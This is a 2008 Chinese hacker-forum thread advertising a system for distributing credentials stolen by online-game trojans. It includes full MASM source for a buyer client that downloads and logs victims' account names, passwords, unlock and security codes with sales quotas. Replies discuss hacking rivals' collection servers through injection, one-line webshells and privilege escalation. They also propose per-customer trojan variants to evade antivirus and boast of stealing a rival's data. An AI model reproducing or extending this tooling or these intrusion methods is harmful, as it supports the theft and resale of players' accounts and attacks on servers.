[原创]新概念收信程序 箱子永远不会被黑
文章作者:asm(http;//www.game8.cc/)信息来源:邪恶八进制
游戏箱子平台出信程序说明:
为什么说这套程序能保护箱子不被黑?
[color=Red]一,采用exe的方式直接从服务器取信,从根本上杜绝SQL注入,避免黑客猜解管理员密码登陆,保证箱子安全。[/color]
[color=Blue]二,一切用户密码都经过加密传输,避免黑客嗅探获取密码,保证买家的信封安全。[/color]
[color=SeaGreen]三,系统化平台出信,把一款游戏的所有游戏马信封都集中在一起分区出信给买家。[/color]
很多人都怕自己的箱子被人黑,同时其他的收信程序不够系统化,没有一个收信程序把所有的信封都放在一起,分区出信。在这样的情况下,本程序应运而生。还在害怕黑客黑你的箱子吗?那么请用这套《游戏箱子平台出信程序》吧。用了他,你箱子本身绝对不会被黑。
本软件独创的远程提信技术,直接从服务器取信,不给黑客入侵的机会,并且用户密码加密传输,就算黑客嗅探到加密的密码,他没有还原算法,也无法解密,从而在根本上保护了您箱子的安全。同时,这套软件能够把几款游戏马的信放在一起,分区出信给下家,方便快捷
一,服务端.exe:把这个文件放在箱子的目录里,然后打开。会显示小箱子用户登陆的用户名,预定量,提信量,并且还能显示到期用户
二,用户提信客户端.exe :这个程序是给买信家使用。填写IP地址和用户名,密码。当提信的总量少于预定量的时候,还可以继续提信。当预定量等于提信量的时候,会终止用户提信。
三,收信地址:http://你的域名/post77578.asp 这个收信地址目前只支持“大小姐”跟“天下无马”的大话2游戏马。两个游戏马通用。
注意:总箱子进信量在用户提信是会显示
声明:本软件只能授权后使用,未经授权使用者所发生的不可预知的情况软件作者将不负任何责任。
本程序公开测试,测试版本只支持大小姐和天下无马的大话2游戏马,有其他要求的请联系作者订制。
本版本为测试版,仅做为测试之用,会有测试期限。如需要继续使用,请联系作者获取正式版。谢谢
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
:handshake [attach]7197[/attach][attach]7197[/attach][attach]7198[/attach]
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
下面是client的代码:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; by asm, [url]http://www.game8.cc/[/url]
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Client.asm
; 用户提信客户端 -- 下家取信工具
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 使用 nmake 或下列命令进行编译和链接:
; ml /c /coff Client1.asm
; rc Client.rc
; Link /subsystem:windows Client1.obj Client.res
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none ; case sensitive
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 数据
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include wsock32.inc
includelib wsock32.lib
include comctl32.inc
includelib comctl32.lib
include shell32.inc
includelib shell32.lib
includelib base64code.lib
include _Message.inc
include macros.inc
DecodeBase64 PROTO c :DWORD, :DWORD
EncodeBase64 PROTO c :DWORD, :DWORD,:DWORD
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; equ 数据
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN equ 1000
DLG_MAIN equ 2000
IDC_LIST1 equ 2001
IDC_COMBOBOXEX2 equ 2002
IDC_EDIT2 equ 2003
IDC_BUTTON4 equ 2004
IDC_PROGRESS1 equ 2005
IDC_AddUser equ 2006
IDC_UserName equ 2007
IDC_PassWord equ 2008
IDC_Qu equ 2009
IDC_Fuwuqi equ 2010
IDC_EDIT14 equ 2011
IDC_EDIT1 equ 2012
IDC_COMBOBOXEX1 equ 2013
IDC_EDIT3 equ 2014
IDC_SERVER equ 2015
IDC_USER equ 2016
IDC_PASS equ 2017
IDC_LOGIN equ 2018
IDC_LOGOUT equ 2019
IDC_BUTTON3 equ 2020
;IDC_BUTTON4 equ 2021
TCP_PORT equ 9999
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hInstance dd ?
hWinMain dd ?
hSocket dd ?
dwLastTime dd ?
szServer db 16 dup (?)
szUserName db 12 dup (?)
szPassword db 12 dup (?)
szText db 256 dup (?)
hList dd ?
@szBuffer db 5026 dup(?)
@dwListviewitem dd ?
hhang dd ?
szMessage db 100 dup(?)
szMessage1 db 100 dup(?)
szMessage2 db 100 dup(?)
szMessage3 db 100 dup(?)
szMessage4 db 100 dup(?)
szMessage5 db 100 dup(?)
szMessage6 db 100 dup(?)
szMessage7 db 100 dup(?)
szMessage8 db 100 dup(?)
szMessage9 db 100 dup(?)
szMessage10 db 100 dup(?)
hEdit dd ?
szWrite db 1024 dup(?)
@hFiledaka dd ?
@dwWritedaka dd ?
@dwWritebyte1 DWORD ?
szBaseUserName db 100 dup(?)
szBasePassword db 100 dup(?)
hNameSize dd ?
hPassSize dd ?
hProgress1 dd ?
@dwCount1 dd ?
.const
szErrIP db '无效的服务器IP地址!',0
szErrConnect db '无法连接到服务器!',0
szErrLogin db '无法登录到服务器,请检查用户名密码!',0
szSpar db ' : ',0
Fmt db "%s",13,10,13,10,0
szFmt db "用户:%s 密码:%s 仓库%s 解锁:%s 密保:%s 服务器:%s 等级:%s 金钱:%s 角色:%s",13,10,13,10,0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
include _SocketRoute.asm
include Fun.asm
include _ListView.asm
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 通讯线程
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_WorkThread proc _lParam
local @stSin:sockaddr_in,@stMsg:MSG_STRUCT
;local @szBuffer[5026]:byte
pushad
invoke GetDlgItem,hWinMain,IDC_SERVER
invoke EnableWindow,eax,FALSE
invoke GetDlgItem,hWinMain,IDC_USER
invoke EnableWindow,eax,FALSE
invoke GetDlgItem,hWinMain,IDC_PASS
invoke EnableWindow,eax,FALSE
invoke GetDlgItem,hWinMain,IDC_LOGIN
invoke EnableWindow,eax,FALSE
;********************************************************************
; 创建 socket
;********************************************************************
invoke RtlZeroMemory,addr @stSin,sizeof @stSin
invoke inet_addr,addr szServer
.if eax == INADDR_NONE
invoke MessageBox,hWinMain,addr szErrIP,NULL,MB_OK or MB_ICONSTOP
jmp _Ret
.endif
mov @stSin.sin_addr,eax
mov @stSin.sin_family,AF_INET
invoke htons,TCP_PORT
mov @stSin.sin_port,ax
invoke socket,AF_INET,SOCK_STREAM,0
mov hSocket,eax
;********************************************************************
; 连接到服务器
;********************************************************************
invoke connect,hSocket,addr @stSin,sizeof @stSin
.if eax == SOCKET_ERROR
invoke MessageBox,hWinMain,addr szErrConnect,NULL,MB_OK or MB_ICONSTOP
jmp _Ret
.endif
;********************************************************************
; 登录到服务器
;********************************************************************
;invoke DecodeBase64,addr szUserName,addr szBaseUserName
;invoke DecodeBase64,addr szPassword,addr szBaseUserName
invoke lstrlen,addr szUserName
mov hNameSize,eax
invoke EncodeBase64,addr szUserName,addr szBaseUserName,hNameSize
;invoke MessageBox,0,addr szBaseUserName,0,0
invoke lstrlen,addr szPassword
mov hPassSize,eax
invoke EncodeBase64,addr szPassword,addr szBasePassword,hPassSize
;invoke MessageBox,0,addr szBasePassword,0,0
invoke lstrcpy,addr @stMsg.Login.szUserName,addr szBaseUserName
invoke lstrcpy,addr @stMsg.Login.szPassword,addr szBasePassword
mov @stMsg.MsgHead.dwLength,sizeof MSG_HEAD+sizeof MSG_LOGIN
mov @stMsg.MsgHead.dwCmdId,CMD_LOGIN
invoke send,hSocket,addr @stMsg,@stMsg.MsgHead.dwLength,0
cmp eax,SOCKET_ERROR
; jz @F
invoke _RecvPacket,hSocket,addr @stMsg,sizeof @stMsg
; or eax,eax
; jnz @F
; cmp @stMsg.MsgHead.dwCmdId,CMD_LOGIN_RESP
; jnz @F
.if @stMsg.MsgHead.dwCmdId == CMD_LOGIN_RESP
.if @stMsg.LoginResp.dbResult != NULL
; @@:
invoke MessageBox,hWinMain,addr szErrLogin,NULL,MB_OK or MB_ICONSTOP
jmp _Ret
.endif
.endif
invoke GetDlgItem,hWinMain,IDC_LOGOUT
invoke EnableWindow,eax,TRUE
;invoke GetDlgItem,hWinMain,IDC_TEXT
invoke EnableWindow,eax,TRUE
invoke GetTickCount
mov dwLastTime,eax
;********************************************************************
; 循环接收消息
;********************************************************************
;invoke SendMessage,hProgress1,PBM_SETRANGE32,0,@dwCount1
;invoke SendMessage,hProgress1,PBM_SETBARCOLOR,0,00FF0000h
invoke SendMessage,hList,LVM_DELETEALLITEMS,0,0
mov hhang,0
;mov @dwCount1,0
.while hSocket
inc hhang
;inc @dwCount1
;invoke SendMessage,hProgress1,PBM_SETPOS,@dwCount1,0
invoke GetTickCount
sub eax,dwLastTime
.break .if eax >= 60 * 1000
invoke _WaitData,hSocket,200 * 1000
.break .if eax == SOCKET_ERROR
.if eax
invoke _RecvPacket,hSocket,addr @stMsg,sizeof @stMsg
.break .if eax
.if @stMsg.MsgHead.dwCmdId == CMD_MSG_DOWN
invoke RtlZeroMemory,addr szWrite,sizeof szWrite
invoke RtlZeroMemory,addr @szBuffer,sizeof @szBuffer
;invoke wsprintf,addr @szBuffer,addr Fmt,addr @stMsg.MsgDown.szContent
;invoke SendDlgItemMessage,hWinMain,IDC_LIST1,LB_ADDSTRING,0,addr @szBuffer
invoke _ListViewSetItem,hList,hhang,-1,0 ;插入新的一行
mov @dwListviewitem,eax
invoke RtlZeroMemory,addr szText,sizeof szText
invoke wsprintf,addr szText,CTXT("%d"),hhang
invoke _ListViewSetItem,hList,@dwListviewitem,0,addr szText
invoke _ListViewSetItem,hList,@dwListviewitem,1,addr @stMsg.MsgDown.szUser
invoke _ListViewSetItem,hList,@dwListviewitem,2,addr @stMsg.MsgDown.szPass
invoke _ListViewSetItem,hList,@dwListviewitem,3,addr @stMsg.MsgDown.szCKpass
invoke _ListViewSetItem,hList,@dwListviewitem,4,addr @stMsg.MsgDown.szJieSuo
invoke _ListViewSetItem,hList,@dwListviewitem,5,addr @stMsg.MsgDown.szMibao
invoke _ListViewSetItem,hList,@dwListviewitem,6,addr @stMsg.MsgDown.szServer
invoke _ListViewSetItem,hList,@dwListviewitem,7,addr @stMsg.MsgDown.szDengji
invoke _ListViewSetItem,hList,@dwListviewitem,8,addr @stMsg.MsgDown.szJinqian
invoke _ListViewSetItem,hList,@dwListviewitem,9,addr @stMsg.MsgDown.szJiaose
invoke _ListViewSetItem,hList,@dwListviewitem,10,addr @stMsg.MsgDown.szIP
invoke _ListViewSetItem,hList,@dwListviewitem,11,addr @stMsg.MsgDown.szTime
invoke wsprintf,addr szWrite,addr szFmt,\
addr @stMsg.MsgDown.szUser,addr @stMsg.MsgDown.szPass,addr @stMsg.MsgDown.szCKpass,addr @stMsg.MsgDown.szJieSuo,\
addr @stMsg.MsgDown.szMibao,addr @stMsg.MsgDown.szServer,addr @stMsg.MsgDown.szDengji,addr @stMsg.MsgDown.szJinqian,\
addr @stMsg.MsgDown.szJiaose;,addr @stMsg.MsgDown.szIP,addr @stMsg.MsgDown.szTime
invoke GetCurrentDirectory,200,addr @szBuffer
invoke lstrcat,addr @szBuffer,CTXT("\游戏信封文本.log")
invoke CreateFile,addr @szBuffer,GENERIC_WRITE or GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,\
0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov @hFiledaka,eax
invoke SetFilePointer,@hFiledaka,0,NULL,FILE_END
invoke lstrlen,addr szWrite
mov @dwWritedaka,eax
invoke WriteFile,@hFiledaka,addr szWrite,@dwWritedaka,addr @dwWritebyte1,NULL
invoke CloseHandle,@hFiledaka
.endif
.if @stMsg.MsgHead.dwCmdId == CMD_CHECK_Game
invoke MessageBox,0,CTXT("已经到达你所预定的信封量,要想继续提信,请续费"),CTXT("提示"),MB_ICONQUESTION
jmp _Ret
.endif
.if @stMsg.MsgHead.dwCmdId == CMD_CHECK_Name
invoke MessageBox,0,CTXT("错误的用户名!"),CTXT("提示"),MB_ICONQUESTION
jmp _Ret
.endif
.if @stMsg.MsgHead.dwCmdId == CMD_CHECK_Game1
;invoke lstrcat,addr @szBuffer,addr @stMsg.MsgDown.szContent
;invoke RtlZeroMemory,addr @szBuffer,sizeof @szBuffer
;invoke wsprintf,addr @szBuffer,addr Fmt,addr @stMsg.MsgDown.szContent
;invoke SendMessage,hList,EM_SETSEL,-1,0
;invoke SendMessage,hList,EM_REPLACESEL,FALSE,addr @szBuffer
;invoke MessageBox,0,addr @stMsg.MsgDown.szContent,0,0
;invoke SendDlgItemMessage,hWinMain,IDC_LIST1,LB_ADDSTRING,0,addr @szBuffer
;invoke SendDlgItemMessage,hWinMain,IDC_INFO,LB_INSERTSTRING,0,addr @szBuffer
.endif
invoke GetTickCount
mov dwLastTime,eax
.endif
.endw
jmp _Ret
invoke GetDlgItem,hWinMain,IDOK
invoke EnableWindow,eax,FALSE
;invoke GetDlgItem,hWinMain,IDC_TEXT
invoke EnableWindow,eax,FALSE
invoke GetDlgItem,hWinMain,IDC_LOGOUT
invoke EnableWindow,eax,FALSE
;********************************************************************
_Ret:
.if hSocket
invoke closesocket,hSocket
xor eax,eax
mov hSocket,eax
.endif
invoke GetDlgItem,hWinMain,IDC_SERVER
invoke EnableWindow,eax,TRUE
invoke GetDlgItem,hWinMain,IDC_USER
invoke EnableWindow,eax,TRUE
invoke GetDlgItem,hWinMain,IDC_PASS
invoke EnableWindow,eax,TRUE
invoke GetDlgItem,hWinMain,IDC_LOGIN
invoke EnableWindow,eax,TRUE
popad
ret
_WorkThread endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 主窗口程序
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam
local @stWsa:WSADATA,@stMsg:MSG_STRUCT
mov eax,wMsg
;********************************************************************
.if eax == WM_COMMAND
mov eax,wParam
;********************************************************************
; 全部输入IP地址,用户名和密码后则激活"登录"按钮
;********************************************************************
.if (ax == IDC_SERVER) || (ax == IDC_USER) || (ax == IDC_PASS)
invoke GetDlgItemText,hWinMain,IDC_SERVER,addr szServer,sizeof szServer
invoke GetDlgItemText,hWinMain,IDC_USER,addr szUserName,sizeof szUserName
invoke GetDlgItemText,hWinMain,IDC_PASS,addr szPassword,sizeof szPassword
invoke GetDlgItem,hWinMain,IDC_LOGIN
.if szServer && szUserName && szPassword && !hSocket
invoke EnableWindow,eax,TRUE
.else
invoke EnableWindow,eax,FALSE
.endif
;********************************************************************
; 登录成功后,输入聊天语句后才激活"发送"按钮
;********************************************************************
; .elseif ax == IDC_LIST1
; invoke GetDlgItemText,hWinMain,IDC_TEXT,addr szText,sizeof szText
; invoke GetDlgItem,hWinMain,IDOK
; .if szText && hSocket
; invoke EnableWindow,eax,TRUE
; .else
; invoke EnableWindow,eax,FALSE
; .endif
;********************************************************************
.elseif ax == IDC_LOGIN
invoke DeleteFile,CTXT("游戏信封文本.log")
push ecx
invoke CreateThread,NULL,0,offset _WorkThread,0,NULL,esp
pop ecx
invoke CloseHandle,eax
.elseif ax == IDC_BUTTON4
invoke DeleteFile,CTXT("游戏信封文本.log")
push ecx
invoke CreateThread,NULL,0,offset _WorkThread,0,NULL,esp
pop ecx
invoke CloseHandle,eax
;********************************************************************
.elseif ax == IDC_LOGOUT
@@:
.if hSocket
invoke closesocket,hSocket
xor eax,eax
mov hSocket,eax
.endif
invoke GetDlgItem,hWinMain,IDC_SERVER
invoke EnableWindow,eax,TRUE
invoke GetDlgItem,hWinMain,IDC_USER
invoke EnableWindow,eax,TRUE
invoke GetDlgItem,hWinMain,IDC_PASS
invoke EnableWindow,eax,TRUE
invoke GetDlgItem,hWinMain,IDC_LOGIN
invoke EnableWindow,eax,TRUE
;********************************************************************
.elseif ax == IDOK
invoke lstrcpy,addr @stMsg.MsgUp.szContent,addr szText
invoke lstrlen,addr @stMsg.MsgUp.szContent
inc eax
mov @stMsg.MsgUp.dwLength,eax
add eax,sizeof MSG_HEAD+MSG_UP.szContent
mov @stMsg.MsgHead.dwLength,eax
mov @stMsg.MsgHead.dwCmdId,CMD_MSG_UP
invoke send,hSocket,addr @stMsg,@stMsg.MsgHead.dwLength,0
cmp eax,SOCKET_ERROR
jz @B
invoke GetTickCount
mov dwLastTime,eax
; invoke SetDlgItemText,hWinMain,IDC_TEXT,NULL
; invoke GetDlgItem,hWinMain,IDC_TEXT
invoke SetFocus,eax
.endif
;********************************************************************
.elseif eax == WM_CLOSE
.if ! hSocket
invoke WSACleanup
invoke EndDialog,hWinMain,NULL
.endif
;********************************************************************
.elseif eax == WM_INITDIALOG
push hWnd
pop hWinMain
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
invoke GetDlgItem,hWnd,IDC_LIST1
mov hList,eax
invoke GetDlgItem,hWnd,IDC_BUTTON3
mov hEdit,eax
;invoke GetDlgItem,hWnd,IDC_PROGRESS1
;mov hProgress1,eax
;mov @dwCount1,0
;invoke SendMessage,hProgress1,PBM_SETRANGE32,0,@dwCount1
;invoke SendMessage,hProgress1,PBM_SETBARCOLOR,0,00FF0000h
invoke _ListViewAddColumn,hList,0,50,CTXT("ID")
invoke _ListViewAddColumn,hList,1,100,CTXT("用户")
invoke _ListViewAddColumn,hList,2,100,CTXT("密码")
invoke _ListViewAddColumn,hList,3,80,CTXT("仓库密码")
invoke _ListViewAddColumn,hList,4,100,CTXT("解锁码") ;小姐
invoke _ListViewAddColumn,hList,5,80,CTXT("密保") ;小姐
invoke _ListViewAddColumn,hList,6,80,CTXT("服务器")
invoke _ListViewAddColumn,hList,7,50,CTXT("等级")
invoke _ListViewAddColumn,hList,8,50,CTXT("金钱")
invoke _ListViewAddColumn,hList,9,50,CTXT("角色")
invoke _ListViewAddColumn,hList,10,100,CTXT("IP")
invoke _ListViewAddColumn,hList,11,100,CTXT("时间")
invoke WSAStartup,101h,addr @stWsa
; invoke SendDlgItemMessage,hWinMain,IDC_SERVER,EM_SETLIMITTEXT,15,0
; invoke SendDlgItemMessage,hWinMain,IDC_USER,EM_SETLIMITTEXT,11,0
; invoke SendDlgItemMessage,hWinMain,IDC_PASS,EM_SETLIMITTEXT,11,0
; invoke SendDlgItemMessage,hWinMain,IDC_TEXT,EM_SETLIMITTEXT,250,0
invoke ShellExecute,0,0,CTXT("http://www.game8.cc/"),0,0,SW_SHOW
.elseif eax == WM_NOTIFY
mov eax,wParam
.if eax == IDC_LIST1
push edi
mov edi, lParam
.if [edi.NMHDR].code == NM_DBLCLK ;双击
invoke RtlZeroMemory,addr szMessage,sizeof szMessage
invoke RtlZeroMemory,addr szMessage1,sizeof szMessage
invoke RtlZeroMemory,addr szMessage2,sizeof szMessage
invoke RtlZeroMemory,addr szMessage3,sizeof szMessage
invoke RtlZeroMemory,addr szMessage4,sizeof szMessage
invoke RtlZeroMemory,addr szMessage5,sizeof szMessage
invoke RtlZeroMemory,addr szMessage6,sizeof szMessage
invoke RtlZeroMemory,addr szMessage7,sizeof szMessage
invoke RtlZeroMemory,addr szMessage8,sizeof szMessage
invoke RtlZeroMemory,addr szMessage9,sizeof szMessage
invoke RtlZeroMemory,addr szMessage10,sizeof szMessage
invoke RtlZeroMemory,addr szWrite,sizeof szWrite
invoke SetDlgItemText,hWnd,IDC_BUTTON3,CTXT(" ")
invoke _ListViewSelect,hList,1,addr szMessage ,sizeof szMessage
invoke _ListViewSelect,hList,2,addr szMessage1 ,sizeof szMessage
invoke _ListViewSelect,hList,3,addr szMessage2 ,sizeof szMessage
invoke _ListViewSelect,hList,4,addr szMessage3 ,sizeof szMessage
invoke _ListViewSelect,hList,5,addr szMessage4 ,sizeof szMessage
invoke _ListViewSelect,hList,6,addr szMessage5 ,sizeof szMessage
invoke _ListViewSelect,hList,7,addr szMessage6 ,sizeof szMessage
invoke _ListViewSelect,hList,8,addr szMessage7 ,sizeof szMessage
invoke _ListViewSelect,hList,9,addr szMessage8 ,sizeof szMessage
invoke _ListViewSelect,hList,10,addr szMessage9 ,sizeof szMessage
invoke _ListViewSelect,hList,11,addr szMessage10 ,sizeof szMessage
invoke wsprintf,addr szWrite,CTXT("用户:%s 密码:%s 仓库%s 解锁:%s 密保:%s 服务器:%s 等级:%s 金钱:%s 角色:%s IP:%s 时间:%s"),\
addr szMessage,addr szMessage1,addr szMessage2,addr szMessage3,addr szMessage4,addr szMessage5,addr szMessage6,addr szMessage7,addr szMessage8,\
addr szMessage9,addr szMessage10
invoke SendMessage,hEdit,EM_SETSEL,-1,0
invoke SendMessage,hEdit,EM_REPLACESEL,FALSE,addr szWrite
.endif
pop edi
.endif
;********************************************************************
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 程序开始
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke InitCommonControls
invoke DialogBoxParam,eax,DLG_MAIN,NULL,offset _ProcDlgMain,0
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
[[i] 本帖最后由 asm 于 2008-2-4 17:43 编辑 [/i]] 这个好像是根断了黑吃黑的可能性!但是技术是进步的!我想有可能可以破掉你的吧!
而且我没有看懂!你的读取和查看好像还是在asp的基础上!还是没有杜绝asp漏洞存在的可能性呀!
而且最简单的还是社会工程!呵呵!我想这个应该有可能吧!
技术疑问我是提不出来了!闲扯我还是应该有一套吧!呵呵! 收信是ASP的写进数据库。
然后提信直接远程连到服务器上去读数据库。
:loveliness: 但是还是有asp文件的存在!我想就有伪造输入的可能性吧!没准还可能有“一句话木马”的可能呢!:lol
(吓胡掰的 莫见怪:P ) 那个ASP文件就只是一个写数据库的POST文件。~~~
数据库是MDB的,你写10句话进去也没意思啊。~
:) 要搞人家箱子,有五点
一,脚本,你要注射?你压根不知道asp的文件名字,程序根本没有后台,你注射毛线?
二,服务器漏洞,除非你有远程E出。
三,社工,这个就看管理员的意识。
四,sinffer。这个收信程序是没有后台,单对程序来讲,你sinffer到的只有提信时候加密的用户密码,我承认那是base64加密的,但是加密的时候,我把加密的字符“ABCDEFG...+/”的顺序打乱了,如果你不知道正确的排列顺序,就算sinffer到用户密码,你也破不了。当然sinffer到服务器上的FTP除外。
五,旁注。如果这个服务器上只绑定一个收信玉米,那旁注就可以见鬼了。能在服务器上运行exe的,估计不会是虚拟主机商
我真的不敢相信,一个没有su,只绑定一个玉米,这个站就只有几个简单的asp文件,没有后台,这样的服务器,到底有多少人能日下来。
不过我也不能说绝对安全,只是相对目前所有收信程序来说,这套exe收信程序是最安全的 :)
[[i] 本帖最后由 asm 于 2008-2-5 02:00 编辑 [/i]] haha
你怎么保证你这个提信端不被逆向或者反编译,还原算法不就危险了吗:shocked: 把传统的web收信模式改成了.C/S 模式.是属于新的收信方式.至于永远不会被黑一说.不做评论. [quote]原帖由 [i]klever[/i] 于 2008-2-5 17:19 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138066&ptid=32151][img]http://forum.eviloctal.com/images/common/back.gif[/img][/url]
haha
你怎么保证你这个提信端不被逆向或者反编译,还原算法不就危险了吗:shocked: [/quote]
:loveliness: 当然凡事都没有绝对是吧,如果你没有拿到服务端,你逆向谁去?不同的服务端,"ABCDEFG....+/"的顺序是不一样的,呵呵。。。 嘿嘿,学习一下,毕竟也是最好的了。根据这个东西有了个思路就是:
做远程控制,然后卖会员,然后每一个用户名都可以生成不同的木马,因为他们的加密方式不同,然后呢,成千上万的人使用,然后呢,杀毒软件就会很迷茫 哦。。。。。。。 我想木马钱黑箱子,这点就不好办.了,.我有一次看到一个箱子,我想黑箱子,可是 我不知道怎么下手,他是伯乐的.这种ASP程序,.我想没有什么SQL,他是用一个单租的服务器,服务器又不能下手,我真的很郁闷,就算见到箱子我也不会搞 [quote]原帖由 [i]混世魔王[/i] 于 2008-2-5 19:37 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138077&ptid=32151][img]images/common/back.gif[/img][/url]
把传统的web收信模式改成了.C/S 模式.是属于新的收信方式.至于永远不会被黑一说.不做评论. [/quote]
也不能算新的,但是个人觉得安全性是大大的提高了 [quote]原帖由 [i]█黑夜网客█[/i] 于 2008-2-7 03:48 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138162&ptid=32151][img]images/common/back.gif[/img][/url]
我想木马钱黑箱子,这点就不好办.了,.我有一次看到一个箱子,我想黑箱子,可是 我不知道怎么下手,他是伯乐的.这种ASP程序,.我想没有什么SQL,他是用一个单租的服务器,服务器又不能下手,我真的很郁闷,就算见到箱子我也不 ... [/quote]
[attach]10957[/attach]
伯乐的只要是老版的都能日..后来被我日多了.发现漏洞了..给补了.
发来地址我试下能日不.
asm发的这个程序
我原来搞大话BOSS的箱子的时候弄到过
程序还在我移动盘里...
研究了半天ASP代码
才写了一个读信页面把他所有的信都给提了出来
:lol:
[[i] 本帖最后由 fhod 于 2008-2-7 22:51 编辑 [/i]] [quote]原帖由 [i]fhod[/i] 于 2008-2-7 22:50 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138188&ptid=32151][img]images/common/back.gif[/img][/url]
10957
伯乐的只要是老版的都能日..后来被我日多了.发现漏洞了..给补了.
发来地址我试下能日不.
asm发的这个程序
我原来搞大话BOSS的箱子的时候弄到过
程序还在我移动盘里...
研究了半天ASP代码
才写了一个读信页 ... [/quote]
大话BOSS跑单了。。。原来大话BOSS是一个纯asp程序,是我叫一个asp程序员写的,因为那asp程序经常被日,(估计是被你日)后来我自己动手写了exe格式准备给大话boss换上,谁知道他跑单了,所以一直没有用上这个exe的收信。大话BOSS的服务器还是dingking在维护,HOHO,如果你日下服务器,那dingking就很没面子鸟 :shy:
[[i] 本帖最后由 asm 于 2008-2-8 01:12 编辑 [/i]] 貌似我就随便设置了下那个服务器目录权限。上面就一个收信程序。也没必要怎么设置的。。。~~
日下服务器我也不会没面子撒 。。。。嘿嘿...........:lol:
被日下服务器说明我失职了。:loveliness: 服务器上装SU了没?我都忘记了......
我记得那个服务器上有个MSSQL.......很奇怪的是我把MSSQL停了,后面又有人上去开了。。。MSSQL根本都没用的。
后面问了大话BOOS,说是他朋友还有这个服务器的密码。。。。所以那个服务器有点乱。好多人都有密码。:sad: 现在这方面的东西很有由bs向cs转变的趋势。看来只能溢出了。。 [quote]原帖由 [i]dingking[/i] 于 2008-2-8 01:29 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138197&ptid=32151][img]images/common/back.gif[/img][/url]
貌似我就随便设置了下那个服务器目录权限。上面就一个收信程序。也没必要怎么设置的。。。~~
日下服务器我也不会没面子撒 。。。。嘿嘿...........:lol:
被日下服务器说明我失职了。:loveliness: 服务器上装SU ... [/quote]
记的是没装SU
装的话我早提服务器权限咯..
当时黑的大箱子还有感觉三国
我都不记的这个提信程序从哪个箱子弄出来的了.
伯乐的收信程序过滤不严可以提交一句话..然后拿WEBSHELL [quote]原帖由 [i]beetle123[/i] 于 2008-2-8 03:39 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138200&ptid=32151][img]images/common/back.gif[/img][/url]
现在这方面的东西很有由bs向cs转变的趋势。看来只能溢出了。。 [/quote]
洋出更不管用,只要严格计算IP,user,pass的长度就OK了,并且这样的程序代码量不少,是可以严格控制的。。 [quote]原帖由 [i]fhod[/i] 于 2008-2-8 10:40 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138204&ptid=32151][img]images/common/back.gif[/img][/url]
记的是没装SU
装的话我早提服务器权限咯..
当时黑的大箱子还有感觉三国
我都不记的这个提信程序从哪个箱子弄出来的了.
伯乐的收信程序过滤不严可以提交一句话..然后拿WEBSHELL ... [/quote]
